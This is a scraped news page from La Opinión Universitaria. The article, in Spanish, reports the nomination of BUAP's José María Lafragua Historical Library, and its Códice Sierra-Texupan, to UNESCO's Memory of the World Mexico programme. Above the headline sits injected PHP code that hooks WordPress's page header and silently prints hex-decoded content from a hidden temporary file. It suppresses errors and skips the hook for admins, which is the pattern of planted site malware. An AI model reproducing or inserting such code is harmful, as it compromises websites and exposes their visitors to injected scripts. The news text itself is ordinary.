if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Postulan a la BUAP para formar parte del Programa Memoria del Mundo México – La Opinión Universitaria La Opinión Universitaria
Menu

Postulan a la BUAP para formar parte del Programa Memoria del Mundo México

Por Diego Armando Cuautle/@dcuautle

Con el objetivo de preservar y facilitar el acceso universal al patrimonio documental, la Biblioteca Histórica José María Lafragua de la Benemérita Universidad Autónoma de Puebla (BUAP)  fue postulada para formar parte del Programa Memoria del Mundo México debido a que cuenta con el Códice Sierra-Texupan, que destaca entre los más de 97 mil volúmenes.

Dicho documento está compuesto por 62 fojas escritas y pintadas por ambos lados, y corresponde a un libro de contabilidad, el cual es considerado único y se conserva en México, en el que se registraban las adquisiciones de la comunidad de Santa Catarina Texupan cuyas ruinas se ubican en las cercanías del actual Santiago Tejupan, en la Mixteca Alta de Oaxaca.

El códice fue elaborado en papel europeo por diversos escribanos o tlacuilos, entre 1550 y 1564. El texto está escrito en náhuatl y mixteco, con caracteres latinos; asimismo, presenta una doble notación numérica: arábiga y vigesimal mesoamericana.

Cabe señalar que en febrero del 2016, Rosa María Fernández de Zamora, coordinadora del Comité Mexicano Memoria del Mundo de la UNESCO, entregó a la Máxima Casa de Estudios en Puebla los dos reconocimientos que acreditan a Opera Medicinalia y al Canto General, de Pablo Neruda, como documentos parte del registro al que ahora ha sido postulado el Códice Sierra-Texupan.

Debido a su importancia para el acervo documental de nuestro país, el Laboratorio Nacional de Ciencias para la Investigación y Conservación del Patrimonio Cultural (LANCIC) –sede Instituto de Física de la UNAM-, realizó un estudio no destructivo sobre la composición de las tintas usadas en los diversos folios del códice. Esta actividad, coordinada por el doctor José Luis Ruvalcaba Sil, emplea instrumentos de alta tecnología que permiten analizar el archivo sin extraer partes del mismo.

No comments

Deja una respuesta

Tweets recientes